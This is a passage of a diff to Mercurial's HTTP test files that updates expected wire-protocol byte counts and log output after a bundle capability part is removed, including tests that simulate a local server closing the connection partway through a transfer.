\x01version02nbchanges1\\r\\n (esc) + write(9 from 9) -> (679) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) + write(473 from 473) -> (206) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 
0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (197) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (188) 4\\r\\n\x00\x00\x00 \\r\\n (esc) + write(38 from 38) -> (150) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) + write(9 from 9) -> (141) 4\\r\\n\x00\x00\x00:\\r\\n (esc) + write(64 from 64) -> (77) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n + write(9 from 9) -> (68) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (59) 4\\r\\n\x00\x00\x00#\\r\\n (esc) + write(41 from 41) -> (18) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) write(9 from 9) -> (9) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) write(9 from 9) -> (0) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) write limit reached; closing socket @@ -1227,7 +1216,7 @@ Server sends a size 0 chunked-transfer size without terminating \r\n - $ hg serve --config badserver.closeaftersendbytes=1865 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=1739 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid 
> $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone @@ -1243,25 +1232,20 @@ $ killdaemons.py $DAEMON_PIDS #if py36 - $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -26 - sendall(9 from 9) -> (854) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (845) 4\\r\\n\x00\x00\x00)\\r\\n (esc) - sendall(47 from 47) -> (798) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) - sendall(9 from 9) -> (789) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) - sendall(473 from 473) -> (316) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (307) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) 
-> (298) 4\\r\\n\x00\x00\x00 \\r\\n (esc) - sendall(38 from 38) -> (260) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) - sendall(9 from 9) -> (251) 4\\r\\n\x00\x00\x00:\\r\\n (esc) - sendall(64 from 64) -> (187) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n - sendall(9 from 9) -> (178) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (169) 4\\r\\n\x00\x00\x00#\\r\\n (esc) - sendall(41 from 41) -> (128) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) - sendall(9 from 9) -> (119) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (110) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc) - sendall(35 from 35) -> (75) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc) - sendall(9 from 9) -> (66) 4\\r\\n\x00\x00\x00'\\r\\n (esc) - sendall(45 from 45) -> (21) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc) + $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -21 + sendall(9 from 9) -> (747) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (738) 4\\r\\n\x00\x00\x00)\\r\\n (esc) + sendall(47 from 47) -> (691) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) + sendall(9 from 9) -> (682) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) + sendall(473 from 473) -> (209) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 
0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (200) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (191) 4\\r\\n\x00\x00\x00 \\r\\n (esc) + sendall(38 from 38) -> (153) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) + sendall(9 from 9) -> (144) 4\\r\\n\x00\x00\x00:\\r\\n (esc) + sendall(64 from 64) -> (80) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n + sendall(9 from 9) -> (71) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + sendall(9 from 9) -> (62) 4\\r\\n\x00\x00\x00#\\r\\n (esc) + sendall(41 from 41) -> (21) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) sendall(9 from 9) -> (12) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) sendall(9 from 9) -> (3) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) sendall(3 from 5) -> (0) 0\r\n @@ -1272,25 +1256,20 @@ #else - $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -27 - write(9 from 9) -> (854) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (845) 4\\r\\n\x00\x00\x00)\\r\\n (esc) - write(47 from 47) -> (798) 
29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) - write(9 from 9) -> (789) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) - write(473 from 473) -> (316) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (307) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (298) 4\\r\\n\x00\x00\x00 \\r\\n (esc) - write(38 from 38) -> (260) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) - write(9 from 9) -> (251) 4\\r\\n\x00\x00\x00:\\r\\n (esc) - write(64 from 64) -> (187) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n - write(9 from 9) -> (178) 
4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (169) 4\\r\\n\x00\x00\x00#\\r\\n (esc) - write(41 from 41) -> (128) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) - write(9 from 9) -> (119) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) - write(9 from 9) -> (110) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc) - write(35 from 35) -> (75) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc) - write(9 from 9) -> (66) 4\\r\\n\x00\x00\x00'\\r\\n (esc) - write(45 from 45) -> (21) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc) + $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -22 + write(9 from 9) -> (747) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (738) 4\\r\\n\x00\x00\x00)\\r\\n (esc) + write(47 from 47) -> (691) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc) + write(9 from 9) -> (682) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc) + write(473 from 473) -> (209) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 
0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (200) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (191) 4\\r\\n\x00\x00\x00 \\r\\n (esc) + write(38 from 38) -> (153) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc) + write(9 from 9) -> (144) 4\\r\\n\x00\x00\x00:\\r\\n (esc) + write(64 from 64) -> (80) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n + write(9 from 9) -> (71) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) + write(9 from 9) -> (62) 4\\r\\n\x00\x00\x00#\\r\\n (esc) + write(41 from 41) -> (21) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc) write(9 from 9) -> (12) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) write(9 from 9) -> (3) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc) write(3 from 5) -> (0) 0\r\n diff --git a/tests/test-http-protocol.t b/tests/test-http-protocol.t --- a/tests/test-http-protocol.t +++ b/tests/test-http-protocol.t @@ -321,7 +321,7 @@ s> Content-Type: application/mercurial-cbor\r\n s> Content-Length: *\r\n (glob) s> \r\n - s> 
\xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x
02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequi
red\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash sending heads command s> setsockopt(6, 1, 1) -> None (?) s> POST /api/exp-http-v2-0003/ro/heads HTTP/1.1\r\n @@ -437,7 +437,7 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-0.1\r\n - s> Content-Length: 503\r\n + s> Content-Length: 484\r\n s> \r\n s> batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash @@ -474,7 +474,7 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-0.1\r\n - s> Content-Length: 503\r\n + s> Content-Length: 484\r\n s> \r\n real URL is http://$LOCALIP:$HGPORT/redirected (glob) s> batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash @@ -745,7 +745,7 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-0.1\r\n - s> Content-Length: 503\r\n + s> Content-Length: 484\r\n s> \r\n real URL is 
http://$LOCALIP:$HGPORT/redirected (glob) s> batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash diff --git a/tests/test-http.t b/tests/test-http.t --- a/tests/test-http.t +++ b/tests/test-http.t @@ -348,20 +348,20 @@ list of changesets: 7f4e523d01f2cc3765ac8934da3d14db775ff872 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload sending unbundle command - sending 1040 bytes + sending 1023 bytes devel-peer-request: POST http://localhost:$HGPORT2/?cmd=unbundle - devel-peer-request: Content-length 1040 + devel-peer-request: Content-length 1023 devel-peer-request: Content-type application/mercurial-0.1 devel-peer-request: Vary X-HgArg-1,X-HgProto-1 devel-peer-request: X-hgproto-1 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull devel-peer-request: 16 bytes of commands arguments in headers - devel-peer-request: 1040 bytes of data + devel-peer-request: 1023 bytes of data devel-peer-request: finished in *.???? 
